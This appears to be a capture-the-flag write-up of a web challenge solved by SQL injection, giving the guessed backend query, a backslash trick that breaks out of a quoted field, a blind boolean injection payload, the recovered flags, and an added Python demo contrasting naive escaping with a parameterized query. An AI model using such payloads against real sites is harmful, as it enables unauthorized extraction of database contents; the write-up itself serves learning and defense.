When I started this challenge, I first guessed SSRF, exploiting a bot, JavaScript, exploiting something with cryptocurrency, bla bla…
But the solution is SQL injection.
First, guessing how it works: I guessed it uses an action to call a function. In the JavaScript file, I found the getDomain() function.
Second, guessing the arguments: I guessed this function "getDomain" has one argument, and it is coin.
I think I guessed very well.
After that, I guessed the query was something like:
select * from [table_name] where domainName="$_POST['domainName']" and coin="$_POST['coin']"
I guessed the characters ' and " were filtered or replaced, and I guessed the character \ was not replaced or filtered.
So I guessed my solution could use the character [\] to turn ['] into [\'] and escape the query.
I used this payload to exploit it:
action=doCheck&domainName=smallbox.ir\&coin=or if(substr((select anything from tablewhatyouwant limit 1),§1§,1)=0x§4c§,1,0)-- -
and got the flag in the table flag: matesctf: matesctf: fl4g_NT_h3r3_
but I guessed it was not the real flag.
The real flag is in the bingo table: matesctf{sql_f!l73r_i$_n0&_s@’f’_’3’n0ugh!}
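To make the guessed filter and the two-parameter backslash escape above concrete, here is an added example (not code from the challenge or from this write-up) that simulates a quote-only escaping filter, shows which part of the resulting query the database would read as SQL rather than as data, and contrasts it with a parameterized query. The table name `domains`, the column names, the rows, and the MySQL-style backslash handling in the tokenizer are assumptions.

```python
import sqlite3

# Assumed filter of the kind the write-up guesses at: quotes receive a
# backslash, but a backslash in the input is left untouched.
def naive_escape(value: str) -> str:
    return value.replace('"', '\\"').replace("'", "\\'")

def build_query_unsafe(domain: str, coin: str) -> str:
    # String concatenation, mirroring the guessed PHP query.
    return (f'select * from domains where domainName="{naive_escape(domain)}"'
            f' and coin="{naive_escape(coin)}"')

def sql_outside_strings(query: str) -> str:
    """Return the part of `query` that lies outside double-quoted string
    literals, honouring MySQL-style backslash escapes inside a literal.
    Whatever this returns is parsed as SQL, not treated as data."""
    out, in_str, i = [], False, 0
    while i < len(query):
        ch = query[i]
        if in_str:
            if ch == "\\":
                i += 2          # escaped character: stay inside the literal
                continue
            if ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def make_demo_db() -> sqlite3.Connection:
    # Constructed sample data for the safe variant.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table domains(domainName text, coin text)")
    conn.execute("insert into domains values ('smallbox.ir', 'btc')")
    return conn

def build_query_safe(conn: sqlite3.Connection, domain: str, coin: str):
    # Parameterized query: the driver never lets either value end a literal,
    # so a trailing backslash in one field cannot merge it with the next.
    return conn.execute(
        "select * from domains where domainName=? and coin=?", (domain, coin)
    ).fetchall()

if __name__ == "__main__":
    q = build_query_unsafe("smallbox.ir\\", "or 1=1-- -")
    print(q)
    print("parsed as SQL:", sql_outside_strings(q))
```

With the trailing backslash in `domainName`, the tokenizer shows the whole `coin` value landing outside any string literal; the parameterized version returns no rows for the same input.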